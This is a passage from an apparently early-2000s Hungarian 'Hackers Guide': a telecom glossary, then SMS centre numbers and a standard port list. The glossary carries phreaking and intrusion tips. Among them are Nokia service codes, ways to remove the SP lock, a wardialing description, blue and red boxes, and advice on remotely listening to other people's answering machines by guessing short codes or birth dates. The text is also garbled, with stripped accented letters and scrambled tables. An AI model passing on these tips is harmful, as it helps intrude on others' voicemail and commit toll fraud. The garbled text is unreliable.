meg kell rendelni a szolgltattl (pl. hvstarts). definity -plda: hvs tvtele. HVSVEKTOROZS: Elore beprogramozott kezelsi mdszer, utastssorozat. Nagyon hatkony logikai eszkz. A leghatkonyabb s legrugalmasabb eszkz a bejvo hvsok irnytsra. Elsosorban hvselosztsi csoportok forgalmnak kezelsre hasznlhat, de a vrakozsi sorok kezelsre is alkalmas. HV VONAL AZONOSTSA (CLIP = Calling Line Identification Presentation): Bejvo hvs esetn - amennyiben ezt a hv fl nem tiltotta meg - a hvott fl kszlke kijelzi azt a hvszmot, amelyrol a hvst kezdemnyeztk. A hvott fl ezutn dnthet a hvs fogadsrl. IMEI-SZM: International Mobile Equipment Identity number = nemzetkzi mobilkszlk-azonost szm. A kszlk htuljn s a jtllsi jegyen tallhat, 15 szmjegybol ll szmsor.Az IMEI szm az albbiakat jelenti: 123456-12-123456-1 aaaaaa-bb-cccccc-d
74
Hackers Guide
a: TAC Type approval code tipus engedlyezsi szm b: FAC Final assembly code vgso sszeszerelsikdszm c: SNR Serial numbr kszlk sorozatszma d: SP Spare tartalk szm Egykt tipp: Nokia:1610 / 1611 / 2110 / 3110 kszlk IMEI szma: *#06# 3210 / 5110 / 6110 / 6150 / 7110 / 8210 / 8810 stb... kszlk IMEI szma: *#06# szoftver verzi szma: *#0000# szerviz men: *#92702689# EFR aktivls / deaktivls *3370# / #3370# Ga 628 / GH 688 kszlk IMEI szma: *#06# szoftver verzi, gyrtsi id?: >*<<*<* IMX: Integrated Multimedia eXchange, azaz integrlt multimdia-hlzat. Az AT&T az IMX endszerrel egy intzmny sszes kommunikcis csatornjt egy rendszeren bell biztostja, azaz szmtgp-hlzat, telefonkzpont-rendszer, klso s belso kbelezsi rendszer s vgberendezsek (PC, telefon, fax, vide) egy rendszerben. INFOSTRUKTRA: Olyan kommunikcis s informatikai rendszer, amely alkalmas multimdia-informcik (hang, kp, adat) tovbbtsra. Aktv s passzv hlzati elemek ptik fel a kzponti cmadatbzist is tartalmaz rendszert, amelyet kzponti menedzsment felgyel. ISDN (Integrated Services Digital Network = integrlt szolgltats digitlis hlzat): Vrhatan vilgmreture bovlo, nyilvnos tvkzlsi hlzat-szabvny. Lnyege, hogy hasznlatval lehetosg van egyetlen telefonvonalon keresztl egyidoben digitlis hang-, kp- s adatjelek tvitelre. Az ISDN teljesen digitlis, nyilvnos elrssel az ramkrileg kapcsolt s a csomagkapcsolt hlzatok fel. Egyttal digitlis csatlakozsi felletet is nyjt hang- s adattvitel tern a felhasznl s a nyilvnos telefon, valamint a csomagkapcsolt hlzatok kztt.Az isdn rendszerben, az analog tvbeszlo rendszerrel ellenttben az sszekotets kln vezrlo csatornt hasznlnak. ISDN ALAP BEVLASZTS: Alkzponti mellkllomsok a kzcl hlzatbl a kezelo beavatkozsa nlkl, kzvetlenl hvhatak. A mellkek a kzcl ISDN szmmezejbol kapnak hvszmot (Magyarorszgon pl. vidk 6, Budapest 7 jegy). A legkisebb alkzpontok szmra is elrheto, mert a legkisebb csatornaszm 2, ami kettes lpsenknt nvelheto; a lefoglalhat legkisebb szmmezo 10. Minden csatlakozs ktirny, gy mind kimeno, mind bejvo hvs esetn brmely szabad csatorna hasznlhat. ISDN BRI: ISDN alapcsatlakozs (Basic Rate Interface), azaz alapsebessgu hozzfrs a meglvo elofizetoi rprokon. Hrom logikai csatornt (2B+D), azaz 2 egymstl fggetlen 64 kbit/s tviteli sebessgu csatornt s egy 16 kbit/s-os csomagkapcsolt csatornt jelent. Ez utbbi jelzszeneteket szllt a hasznl vgberendezsei s a kzpont kztt. Egy ISDN-alapcsatlakozs ltalban egy hvszmmal rendelkezik. ISDN PRI: ISDN primercsatlakozs (Primary Rate Interface), ami tartalmaz 30 db 64 kbit/s sebessgu informci- s egy 64 kbit/s-os jelzstviteli csatornt (30B+D), kiegsztve egy szabvnyos ISDN-elofizetoi jelzsrendszerrel. Egyszerre max. 30 csatornhoz biztost hozzfrst. Az ISDN PRI az elso olyan szabvnyos 2 Mbit/s-os digitlis elofizetoi csatlakozsi
75
Hackers Guide
forma, amely eurpai szabvnyokon alapul s kapcsolt szolgltats ignybevtelt teszi lehetov. KAPCSOLT VONAL AZONOSTSA (COLP = Connected Line Identification Presentation): Lehetov teszi, hogy a hvst kezdemnyezo fl kszlke kijelezze a tnylegesen kapcsolt elofizeto hvszmt, ha ezt a hvott fl nem tiltotta meg. Ez egyrszt a trcszott szmok helyessgnek ellenorzst szolglja, msrszt akkor van jelentosge, ha a hvott szm el van irnytva s a hvs nem az eredetileg trcszott szmra kerl. KOMMUNIKCIOS PROTOKOLOK: Az adattviteli szablyok ,megllapodok ssszesgt kommunikcis protokolnak nevezzuk.Bvebben:RS-232-C. LOCAL HOOP: Az elfizetok telefonja s a vgpont kztti kthuzalos sszektettst elfizetoi huroknak nevezik. (analog) ha a vilag sszes elfizetoi hurokjt egyms utan kifeszitve kiteritennk akkor az 1982. vi telefon adatok szerint a Fld Hold tvolsg 2000 szerest kapnnk de az adatok 82esek ezrt az eltelt 18 v alatt mar lehet hogy ugyan ez az a 2000 (v)szam a mars fold lenne.jo mi? LB-TELEFON: A kszlkben lvo teleprol tpllt (Local Battery) kszlk. ltalban ilyen kszlkeket hasznlnak pl. a hadseregben rvid tv tbori tvbeszlo cljra. A csengetofeszltsget is a kszlkbe ptett kismretu vltakozram genertor (induktor) biztostja. (=> CB-telefon) MAGNHALZAT: Tvkzlsi berendezsek s az oket sszekto tviteli berendezsek olyan egyttese, amely csak egy meghatrozott trsasg alkalmazottai s zletfelei kztt hoz ltre hang-, kp- vagy adattvitelt. A nyilvnos hlzatoktl fggetlenl mukdnek, de hasznlhatjk, brelhetik azok szolgltatsait. MASSAGE SWITCHING:zenet kapcsols.Ebben a kapcsolsi formaban nincs elore felplt t a kld s a vevo kztt.Ehelyett,amikor az adnak van elkuldendo adatblokja,akkor azt az elso kapcsol kzpont trolja majd ksobb tovabbtja egy msik kapcsolkzpontnak s igy tovbb.Az ilyen technikat hasznlhlzatokat tarol-tovbbt (store and forward) hlzatoknak nevezik. MIKOROCOM NETWORKING PROTOKOL: A modemek szabvnyos hibajavit s tmritoeljarsai az MNP protokolok. MODEM (MOdulator - DEModulator): Informcitvitelt tesz lehetov a jelcsatornn t. Pl. digitlis informcik analg vonalon val tovbbtsakor hasznljk. <------telefonvonal---------->|modem|<---->|soros interfesz|<---->|mikorszamtgp| Ne zavarj szolgltats: Az elofizeto, aki bizonyos ideig nem akarja fogadni az rkezo hvsokat, tirnythatja azt egy rgztett bemondst ad berendezsre, amely rtesti errol a hv felet. NMT: Nordic Mobile Telephone System, azaz szak-eurpai mobiltelefon-rendszer. Ebbe a rendszerbe tartozik pl. a magyarorszgi Westel 450 is. PRHUZAMOS ADATTVITEL: a perifria interfsz s a perifria kztt az adatokat bitcsoportonknt egyszerre visszuk t. PIN-KD: Personal Identification Number = szemlyi azonost szm. Olyan 4-8 szmjegyu kd, mely a SIM-krtya jogtalan hasznlatt akadlyozza meg. Bekapcsolskor a kszlk kri a PIN-kdot. A PIN-kdjt a tulajdonos a SIM-krtya megvtelekor kapja meg egy lezrt bortkban. PUK-KD: Personal Unblocking Key = szemlyes blokkolsfelold kulcs. Ha egyms utn hromszor rossz PIN-kdot ad meg, akkor telefonkszlke
76
Hackers Guide
hasznlhatatlann vlik, a SIM-krtya blokkoldik. Ekkor a PUK-kddal lehet a blokkolst feloldani s a telefont jra mukdokpess tenni. PUK-kdjt a SIM-krtya megvtelekor kapta meg egy lezrt bortkban, a PIN-kddal egytt. PHREAKER(kaloz): A telefonkzpontok vezrloszmtgpeinek, a tvkzlsi vonalak ingyenes ignybevtelnek s ltalban a telekommunikcinak a szakrtoi. Rendelkeznek a kzpontok tprogramozshoz szksges tudssal, illetve megfelelo eszkzkkel a mobil telefon hlzat forgalmnak, belso adatainak lehallgatshoz. Ksobb ok maguk, vagy akiknek az informcikat tovbbadtk msok kltsgre telefonlnak. A 95-s adatok szerint, az sszestett kr tbb mint 4 millird USD. R2/MFC alap bevlaszts: Alkzponti mellkllomsok a kzcl hlzatbl a kezelo beavatkozsa nlkl, kzvetlenl hvhatak. Alkalmazsa csak kzepes s nagy kzpontok esetn clszeru, mert a legkisebb bemeno kapacits 30 csatorna s a legkisebb lefoglalhat szmmezo nem lehet kisebb 100-nl. Magyarorszgon a csatlakozs egyirny; ha az alkzpont - fokzpont irnyban forgalmi torlds lp fel (minden fovonal foglalt), akkor az alkzpontbl kimeno hvs nem kezdemnyezheto akkor sem, ha a trnkcsoport foglaltsga minimlis. RENDSZERIGAZGATS: nlklzhetetlen eleme egy modern hlzatnak. Az ide tartoz tevkenysgek: - hibabejelents, -behatrols s -dokumentls; programozs (hlzati jellemzok belltsa); - rendszerfelgyelet (krnyezeti, s ms tnyezok mrse); - forgalmi mrsek s jelentskszts. ROAMING: A roaming = vndorls lnyege, hogy a GSM nemzetkzi szabvnynak ksznhetoen az egyes orszgok egyms kzt kompatibilisen ptik ki hlzatukat. gy lehetosg van arra, hogy egyik orszg elofizetoje, ha klfldre utazik, bekapcsoldjon az illeto orszg hlzatba s hasznlja azt, vagyis az adott orszgban vndoroljon. Az elofizetok klfldi tartzkodsuk alatt is ugyangy hasznlhatjk mobiltelefonjukat, mint otthon; klfldn is a sajt telefonszmukon lehet oket elrni. Ehhez azonban a kt orszg szolgltatjnak egy ktoldal n. roaming-megllapodst kell ktnie. SOROS ADATTVITEL: A perifria interfsz s a perifria kztt az adatokat bitenknt sorban egymasutan visszk t. SIMPLEX ADATTVITEL: Az adattvitel csak egyiranyba folyhat,azaz az ad s a vevo szerepe nem vltozhat. SZINES DOBOZOK: A blue box pldul a telefonkzpontok kztti 2600 Hz-es un. in-band jelzseket felhasznlva ingyenes tvhvsra "jogost".De ez mar megszunt a digitalis vonalak terjedsvel magyarokat amugy sem rintet.hm vagy lehet mgis ? (NEM s NEM s NEM!!! Magyarorszgon _NEM_ lehet dobozolni!!!!! - MMan) Red box a pnz leessekor keletkezo jelet emulaja pl:5,10,25,50 centesekt. SIM-KRTYA: (Subscriber Identity Modul)A GSM rendszerhez val csatlakozshoz nnek szksge van egy SIM-krtyra. A SIM-krtya biztostja az elofizetok azonostst a GSM rendszern bell, illetve ms rendszerekben, azaz tartalmazza az elofizeto telefonszmt (szmait). A GSM kzpontja az egyes elofizetok szolgltatsait is SIM-krtyjuk alapjn azonostja, ezzel biztostva, hogy mindenki az ltala megrendelt szolgltatst vehesse ignybe. Ezen kvl a SIM-krtya teszi lehetov, hogy a hvsokat mindig a megfelelo elofizetonek szmlzzk ki, mivel a SIM-krtya azonostja az elofizetot a szmlzsi rendszer szmra is. A SIM-krtya minden GSM rendszeru telefonkszlkbe behelyezheto s mukdtetheto, fggetlenl annak tpustl. A SIM krtyhoz rendelt PIN, PUK, ADM kdokat a krtya egyedi azonostja (ID) s egy, csak agyrt ltal ismert kulcs felhasznlsval generljk a DES algoritmus
77
Hackers Guide
segtsgvel. A SIM krtyn kt fontos adat szerepel. A 15 szmjegy hossz IMSI (International Mobile Subscriber Identity), a nemzetkzi mobil elofizeto azonost, s a elofizeto autentikcis kulcsa a Ki, ami egy 32 hexadecimlis karakter hossz kulcs, s a legbiztonsgosabban vdett kd a GSM rendszerben SMS:rvid szoveges uzenet hossza max160 karakter, a teljesg ignye nlkl nhny SMS kzpont szm: Orszg neve: Andorra Australia Austria Belgium Canada China Czech Republic Denmark Estonia Finland France Hlzat neve: STA Telstar Optus Vodafone A1 Mobilkom Proximus Mobistar Fido Telecom Eurotel Radiomobil TeleDanmark Sonofon EMT Ritabell Radiolinja Radiolinja Nokia Sonera Bouygues Itineris SFR D1 D2 zenetkzpont szma: +376 30 1004 +61 418 706700 +61 412 025989 +61 21 600600 +43 664 0501 +43 676 021 +32 75 161616 +32 75 161612 +32 95 955205 +1 514 993 1123 +86 139 059 1500 +420 602 909909 +420 603 051 +45 405 90000 +45 403 90999 +45 436 25250 +372 50 99000 +372 55 09911 +372 56 8771010 +358 50 877 1010 +358 40 520 2999 +358 40 520 2000 +33 660 00 30 00 +33 007 00 10 80 +33 689 00 45 81 +33 609 00 13 90 +49 171 0760000 +49 172 227033 +49 172 2270000 +49 172 2270222 +49 172 2270333 +49 177 0600000 +49 177 0610000 +49 177 0620000 +49 172 2270258 +49 171 0760900 +49 172 2270222 +49 172 2270201 +49 172 2270111 +44 385 016005 +30 935 99000 +30 385 0116005
Germany
E-Plus Talkline Debitel IC 3S Dr Materna Panafon Telestat OTE Hellas
Greece
78
Hackers Guide
Holland Hong Kong Hungary
Libertel PTT HK Telecom Hutchinson Pannon GSM Westel Vodafone Postur og Simi GSM-XL Satelindo Telkomsel Eircell Esat Omni TIM
Iceland Indonesia Ireland Italy
Latvia Lebanon Lithuania Luxembourg Malaysia
New Zealand Norway
LMT Lebancell Omnitel Bite GSM PTT Adam Celcom Maxis Mutiara Bell South Netcom TeleNor
Poland
Era GSM Polkomtel
Portugal Russia Singapore
IDEA Centertel Telcel TMN Beeline 1800 MTS North West Mobile One SingTel Eurotel MTN
Slovakia South Africa
+31 654 881000 +31 653 131313 +852 9028 8000 +852 9498 5795 +36 203 00099 +36 306 10000 +36 308 88000 +36 303 03100 +36 709 996500 +3854 890 0100 +62 818 445009 +62 816 15 +62 811 130004 +353 87 699985 +353 87 699989 +353 86 800 2000 +39 349 2000300 +39 349 2000200 +39 338 960960 +39 338 980000 +371 920 2020 +961 348 8888 +37 0989 9992 +37 0995 0115 +352 021 100003 +60 17 360 0010 +60 19 390 0000 +60 12 000 0015 +60 16 299 9000 +64 21 600600 +47 920 01000 +47 920 8977 +47 900 02100 +47 900 07777 +48 602 951111 +48 602 951112 +48 601 000311 +48 601 000310 +48 501 200777 +351 931 770077 +351 931 770077 +7 901 73100 +7 095 7699100 +7 812 9600096 +65 968 45999 +65 964 00001 +65 965 00001 +65 981 89999 +421 90 3333000 +27 83 1000002
79
Hackers Guide
Vodacom Spain Sweden Airtel Telefonica Comviq Europolitan Telia Natel-D AIS Globe Turkcell Telsim One-2-One Cellnet Orange Vodafone Aerial Coms Microcell Telecom Omnipoint Powertel Pacific Bell Sprint Washington PCS
Switzerland Thailand The Philipines Turkey United Kingdom
USA
+27 82 9119 +27 82 9129 +34 60713 3000 +34 60700 3110 +34 60909 0909 +46 707 990001 +46 707 990003 +46 707 773078 +46 708 000708 +46 705 008999 +41 794999000 +66 1811 0888 +63 91 702 +90 53290 10000 +90 542 9800033 +44 7958 879879 +44 802 000332 +44 973 100973 +44 385 016005 +1 813 263 0025 +1 281 235 0025 +1 514 993 1123 +1 917 907 0004 +1 334 333 8200 +1 209 904 2010 +1 704 410 0000 +1 410 258953
lehet lelkesen proglgatni a freesmst... SP: ( Service Provider ) lock A Service Provider lock a szolgltatk ltal hasznlt kdvdelem, melynek lnyege, hogy az SP lock-os telefon csak az adottszolgltat SIM krtyjt fogadja el. Idegen krtyval nem lehet hasznlni. Ezt a szolgltatk sajt szerzdseik megvdsre hasznljk, hiszen nekik a hossz tv elfizets hozza a bevtelt. A bevtelek elrekalkulcijval rjttek, hogy nekik nem rfizets a telefonokat akciban olcsbban adni, hiszen minl olcsbb a kszlk, annl tbb gyfelet vonzanak, gy nagyobb lesz a bevtelk, s a mrleg pozitv marad. De ennek felttele, hogy maradjon az gyfl az adott elfizetsnl. Ezt a vdelmet pedig az SP lock biztostja. De nzzk a msik oldalrl. Azzal, hogy az SP lock-ot eltntetjk, jval megnveljk a telefon rtkt, hiszen az akciban vett telefonhoz akr 1/5 ron is hozz lehet jutni. Az SP lock kivtele utn a telefon megkzelti az eredeti rtkt. Lehetsg pedig van a lock feloldsra. A Nokia telefonokon van egy kifejezetten szervzfunkcikat ellt flduplex busz, melyet a PC soros portjval lehet sszektni a megfelel adatkbellel. Ezen keresztl lehet elvgezni az SP lock feloldsi muvelett. Az SP lock hasznlata elterjedt egsz Eurpban, szinte valamennyi szolgltat hasznlja mr. Nlunk a Pannon GSM s a Westel900 is ezek kz tartozik. Ha akciban vetted a telefonod, akkor biztos lehetsz benne, hogy SP lock van benne. Az rtke addig nem lesz tbb az akcis rnl, amg ez a lock mukdik benne. Egy plda: Nokia 5110/SL ( SL = SP lock-os telefon ) akcis ra elfizetssel 15 ezer forint volt (nett). A Nokia 5110 lock
80
Hackers Guide
nlkli telefon j ra 80 ezer forint (nett). A feloldsra a Nokia telefonoknl ltezik egy msik mdszer is. Mgpedig egy olyan algoritmus kell hozz, ami az IMEI szmbl szmolja a lock feloldshoz szksges kdot. Ezt a kdot azutn bekell tni a telefonba egy ennek megfelel elkddal egytt. Ez elvileg hatstalantja az SP lock-ot. SZAKRTO GYINTZK KIVLASZTSA: A bejvo hvsok a hvselosztsi csoporton bell kisebb,specilis gyintzoi csoportra kapcsoldhatnak. Segtsgvel tkletesen sszehozhat a hv ignye s az ennek megfelelo szaktuds s tapasztalat gyintzo (nyelvtuds, egy bizonyos termk ismerete, stb.). TRCSAHANG: A kzpont ezzel a figyelmezteto jelzssel zeni a felhasznlnak, hogy kszen ll a hvand szm szmjegyeinek fogadsra. TVOLI ELRS STTUSZA: Megvalsthat tvolrl hvs a cg szmljra, azaz otthonrl is lebonyolthat telefonokat (pl. klfldre) a cg szmljra. Az erre jogosult szemlyek klnbzo kdokkal (szolgltats-kd, azonost kd) aktivlhatjk ezt a szolgltatst. Nyomon kvethetoek, azaz adminisztrlhatak ezek a hvsok is, gy lehetov vlik a visszalsek megszntetse. TMRITSI ALGORITMUSOK: Ezen eljrsok lnyege, hogy a rendelkezsre ll (pl. ADCltal szolgltatott) binris szmokat valamilyen logikai rendszer szerint rendezi. Ezltal egy, az eredetinl kisebb mretu adathalmazt nyernk, gy azonos ido alatt ugyanazon tviteli csatornn jval tbb informci viheto t. TRNK: Kt kzpontot sszekto specilis kbelkteg. Nincs kzvetlen kapcsolatban az elofizetokkel, a kzpontok kztti forgalmat bonyoltja. TOLL OFFICE: Minden vgkzpont tbb kimen vonalal kapcsolodik a szomszdos kapcsolkzpontokhoz az un tavhv kzpontokhoz(toll office)Ezeket a vonalakat helyzi trnkknek (toll connecting trunk)nevezik. A tvhivo kozpontok kzpontkozi trnkkn keresztl kommuniklnak egymassal. UTELNYOMS (deemphasis): A vevooldalon az elokiemelskor (=> elokiemels) mestersgesen eltorztott frekvenciamenet visszlltsa. ZEMFELUGYELET: Egy szmtgp segtsgvel trtnik. A gp kzvetlenl az alkzponthoz csatlakozhat, vagy modem segtsgvel tvfelgyelet is megvalsthat. Az zemfelgyeleti programba val belpshez a felhasznlnak ismernie kell a jelszt, gy a rendszer a jogosulatlan prblkozktl vdve van. A rendszertechnikus egy trcszhat sszekttetsen keresztl belphet a rendszerbe s egy tvoli munkahelyrol is elvgezheti a felgyeleti s karbantartsi muveleteket. A kzpont tvolrl is programozhat s tvoli mentsek is elvgezhetoek. ZENETRGZTO: Ht ezt ne irom le hogy mit jelent csak egy tippet adk a tmeghallgatsra a legtobb panaszonic zenetrgztot tvolrol meg lehet hallgatni ha tudjuk a lejatszshoz szuksges kodot es nyomunk egy csillag gombot de a legviccesebb a dologban hogy ltalban ez a kod 1 jegyu az az 10 lehetosg mert a nulla is benne van .A noname rgztoknl hasonl a helyzet. Ritka de ltezik 3 kd zenet rgzto,ezek vltoztathatok clszeru a szletsi et megproblni .(Neknk is Panasonic van speciel...MMan.:)))) VNDORLS: (=> roaming) VONALKAPCSOLT TVITEL: Az eroforrs a kapcsolat egsz idejre lefoglaldik, a folyamatos informciramls biztostott (pl. telefon). Elonye, hogy a vgpontok kztti ksleltets minimlis s ingadozsmentes. Htrnya, hogy a fix svszlessg miatt rugalmatlan. (=> csomagkapcsolt tvitel) WARDIAL: A wardialer egy program ami a teltalad megadott intervallumban(pl.
81
Hackers Guide
0680200 000-999) telefonszmokat hv fel. Te belehallgathatsz ezekbe a szmokba, gy tallhatsz rengeteg informcis vonalat.by mman 2000 by MMan.
************************************************************************************************
Szabvnyos portok listja Itt van egy portlista, amely megmutatja, hogy szabvnyos esetben melyik porton milyen szolgltats zemel. Ez a lista innen szrmazik:http://forbidden.netsecurity.org//[SiRiUs]/ 0=Reserved 1=tcpmux 2=compressnet 3=compressnet 4=Unassigned 5=Remote Job Entr 6=Unassigned 7=Echo 8=Unassigned 9=Discard 10=Unassigned 11=Active Users 12=Unassigned 13=Daytime 14=Unassigned 15=Unassigned 16=Unassigned 17=Quote of the Day 18=Message Send Protocol 19=Character Generator 20=FTP (Data) 21=FTP (Control) 22=Unassigned 23=Telnet 24=Private mail-system 25=SMTP 26=Unassigned 27=NSW User System FE 28=Unassigned 29=MSG ICP
82
Hackers Guide
30=Unassigned 31=MSG Authentication 32=Unassigned 33=Display Support Protocol 34=Unassigned 35=Private printer server 36=Unassigned 37=Time 38=Route Access Protocol 39=Resource Location Protocol 40=Unassigned 41=Graphics 42=Host Name Server 43=Who Is 44=MPM FLAGS Protocol 45=Message Processing Module (recv) 46=mpm-snd, MPM (default send) 47=ni-ftp 48=Digital Audit Daemon 49=login, Login Host Protocol 50=re-mail-ck, Remote Mail Checking Protocol 51=IMP Logical Address Maintenance 52=xns-time, XNS Time Protocol 53=domain, Domain Name Server 54=xns-ch, XNS Clearinghouse 55=ISI Graphics Language 56=XNS Authentication 57=Private terminal access 58=XNS Mail 59=Private file service 60=Unassigned 61=NI MAIL 62=ACA Services 63=Unassigned 64=Communications Integrator (CI) 65=TACACS-Database Service 66=Oracle SQL*NET 67=Bootstrap Protocol Server 68=Bootstrap Protocol Client 69=Trivial File Transfer 70=Gophergopher 71=Remote Job Service 72=Remote Job Service 73=Remote Job Service 74=Remote Job Service 75=any private dial out service 76=Distributed External Object Store 77=any private RJE service 78=vettcpvettcp 79=Finger server
83
Hackers Guide
80=HTTP 81=HOSTS2 Name Server 82=XFER Utility 83=MIT ML Device 84=Common Trace Facility 85=MIT ML Device 86=Micro Focus Cobol 87=Private terminal link 88=Kerberos 89=SU/MIT Telnet Gateway 90=DNSIX Securit Attribute Token Map 91=MIT Dover Spooler 92=Network Printing Protocol 93=Device Control Protocol 94=Tivoli Object Dispatcher 95=SUPDUPsupdup 96=DIXIE Protocol Specification 97=Swift Remote Vitural File Protocol 98=TAC Newstacnews 99=Metagram Relay 100=newacct [unauthorized use] 101=NIC Host Name Server 102=ISO-TSAP 103=Genesis Point-to-Point Trans Net 104=ACR-NEMA Digital Imag. & Comm. 300 105=Mailbox Name Nameserver 106=3COM-TSMUX3com-tsmux 107=Remote Telnet Service 108=SNA Gateway Access Server 109=Post Office Protocol - Version 2 110=Post Office Protocol - Version 3 111=SUN RPC 112=McIDAS Data Transmission Protocol 113=Authentication Service 114=Audio News Multicast 115=Simple File Transfer Protocol 116=ANSA REX Notify 117=UUCP Path Service 118=SQL Servicessqlserv 119=Network News Transfer Protocol 120=CFDPTKTcfdptkt 121=Encore Expedited Remote Pro.Call 122=SMAKYNETsmakynet 123=Network Time Protocol 124=ANSA REX Trader 125=Locus PC-Interface Net Map Ser 126=Unisys Unitary Login 127=Locus PC-Interface Conn Server 128=GSS X License Verification 129=Password Generator Protocol
84
Hackers Guide
130=cisco FNATIVE 131=cisco TNATIVE 132=cisco SYSMAINT 133=Statistics Service 134=INGRES-NET Service 135=Location Service 136=PROFILE Naming System 137=NETBIOS Name Service 138=NETBIOS Datagram Service 139=NETBIOS Session Service 140=EMFIS Data Service 141=EMFIS Control Service 142=Britton-Lee IDM 143=Interim Mail Access Protocol v2 144=NewSnews 145=UAAC Protocoluaac 146=ISO-IP0iso-tp0 147=ISO-IPiso-ip 148=CRONUS-SUPPORT 149=AED 512 Emulation Service 150=SQL-NETsql-net 151=HEMShems 152=Background File Transfer Program 153=SGMPsgmp 154=NETSCnetsc-prod 155=NETSCnetsc-dev 156=SQL Service 157=KNET/VM Command/Message Protocol 158=PCMail Serverpcmail-srv 159=NSS-Routingnss-routing 160=SGMP-TRAPSsgmp-traps 161=SNMP 162=SNMP TRAP 163=CMIP/TCP Manager 164=CMIP/TCP Agent 165=Xeroxxns-courier 166=Sirius Systems 167=NAMPnamp 168=RSVDrsvd 169=Send 170=Network PostScript 170=Network PostScript 171=Network Innovations Multiplex 172=Network Innovations CL/1 173=Xyplexxyplex-mux 174=MAILQ 175=VMNET 176=GENRAD-MUXgenrad-mux 177=X Display Manager Control Protocol 178=NextStep Window Server
85
Hackers Guide
179=Border Gateway Protocol 180=Intergraphris 181=Unifyunify 182=Unisys Audit SITP 183=OCBinderocbinder 184=OCServerocserver 185=Remote-KIS 186=KIS Protocolkis 187=Application Communication Interface 188=Plus Five's MUMPS 189=Queued File Transport 189=Queued File Transport 190=Gateway Access Control Protocol 190=Gateway Access Control Protocol 191=Prospero Directory Service 191=Prospero Directory Service 192=OSU Network Monitoring System 193=srmp, Spider Remote Monitoring Protocol 194=irc, Internet Relay Chat Protocl 195=DNSIX Network Level Module Audit 196=DNSIX Session Mgt Module Audit Redir 197=Directory Location Service 198=Directory Location Service Monitor 199=SMUX 200=IBM System Resource Controller 201=at-rtmp AppleTalk Routing Maintenance 202=at-nbp AppleTalk Name Binding 203=at-3 AppleTalk Unused 204=AppleTalk Echo 205=AppleTalk Unused 206=AppleTalk Zone Information 207=AppleTalk Unused 208=AppleTalk Unused 209=Trivial Authenticated Mail Protocol 210=ANSI Z39.50z39.50 211=Texas Instruments 914C/G Terminal 212=ATEXSSTRanet 213=IPX 214=VM PWSCSvmpwscs 215=Insignia Solutions 216=Access Technology License Server 217=dBASE Unix 218=Netix Message Posting Protocol 219=Unisys ARPsuarps 220=Interactive Mail Access Protocol v3 221=Berkeley rlogind with SPX auth 222=Berkeley rshd with SPX auth 223=Certificate Distribution Center 224=Reserved (224-241) 241=Reserved (224-241)
86
Hackers Guide
242=Unassigned# 243=Survey Measurement 244=Unassigned# 245=LINKlink 246=Display Systems Protocol 247-255 Reserved 256-343 Unassigned 344=Prospero Data Access Protocol 345=Perf Analysis Workbench 346=Zebra serverzserv 347=Fatmen Serverfatserv 348=Cabletron Management Protocol 349-370 Unassigned 371=Clearcaseclearcase 372=Unix Listservulistserv 373=Legent Corporation 374=Legent Corporation 375=Hasslehassle 376=Amiga Envoy Network Inquiry Proto 377=NEC Corporation 378=NEC Corporation 379=TIA/EIA/IS-99 modem client 380=TIA/EIA/IS-99 modem server 381=hp performance data collector 382=hp performance data managed node 383=hp performance data alarm manager 384=A Remote Network Server System 385=IBM Application 386=ASA Message Router Object Def. 387=Appletalk Update-Based Routing Pro. 388=Unidata LDM Version 4 389=Lightweight Directory Access Protocol 390=UISuis 391=SynOptics SNMP Relay Port 392=SynOptics Port Broker Port 393=Data Interpretation System 394=EMBL Nucleic Data Transfer 395=NETscout Control Protocol 396=Novell Netware over IP 397=Multi Protocol Trans. Net. 398=Kryptolankryptolan 399=Unassigned# 400=Workstation Solutions 401=Uninterruptible Power Supply 402=Genie Protocol 403=decapdecap 404=ncednced 405=ncldncld 406=Interactive Mail Support Protocol 407=Timbuktutimbuktu
87
Hackers Guide
408=Prospero Resource Manager Sys. Man. 409=Prospero Resource Manager Node Man. 410=DECLadebug Remote Debug Protocol 411=Remote MT Protocol 412=Trap Convention Port 413=SMSPsmsp 414=InfoSeekinfoseek 415=BNetbnet 416=Silverplattersilverplatter 417=Onmuxonmux 418=Hyper-Ghyper-g 419=Arielariel1 420=SMPTEsmpte 421=Arielariel2 422=Arielariel3 423=IBM Operations Planning and Control Start 424=IBM Operations Planning and Control Track 425=ICADicad-el 426=smartsdpsmartsdp 427=Server Location 429=OCS_AMU 430=UTMPSDutmpsd 431=UTMPCDutmpcd 432=IASDiasd 433=NNSPnnsp 434=MobileIP-Agent 435=MobilIP-MN 436=DNA-CMLdna-cml 437=comscmcomscm 439=dasp, Thomas Obermair 440=sgcpsgcp 441=decvms-sysmgtdecvms-sysmgt 442=cvc_hostdcvc_hostd 443=https 444=Simple Network Paging Protocol 445=Microsoft-DS 446=DDM-RDBddm-rdb 447=DDM-RFMddm-dfm 448=DDM-BYTEddm-byte 449=AS Server Mapper 450=TServertserver 512=exec, Remote process execution 513=login, remote login 514=cmd, exec with auto auth. 514=syslog 515=Printer spooler 516=Unassigned 517=talk 519=unixtime 520=extended file name server
88
Hackers Guide
521=Unassigned 522=Unassigned 523=Unassigned 524=Unassigned 526=newdate 530=rpc courier 531=chatconference 532=readnewsnetnews 533=for emergency broadcasts 539=Apertus Technologies Load Determination 540=uucp 541=uucp-rlogin 542=Unassigned 543=klogin 544=kshell 545=Unassigned 546=Unassigned 547=Unassigned 548=Unassigned 549=Unassigned 550=new-who 551=Unassigned 552=Unassigned 553=Unassigned 554=Unassigned 555=dsf 556=remotefs 557-559=rmonitor 560=rmonitord 561=dmonitor 562=chcmd 563=Unassigned 564=plan 9 file service 565=whoami 566-569 Unassigned 570=demonmeter 571=udemonmeter 572-599 Unassigned ipc server 600=Sun IPC server 607=nqs 606=Cray Unified Resource Manager 608=Sender-Initiated/Unsolicited File Transfer 609=npmp-trapnpmp-trap 610=npmp-localnpmp-local 611=npmp-guinpmp-gui 634=ginadginad 666=Doom Id Software 704=errlog copy/server daemon 709=EntrustManager 729=IBM NetView DM/6000 Server/Client
89
Hackers Guide
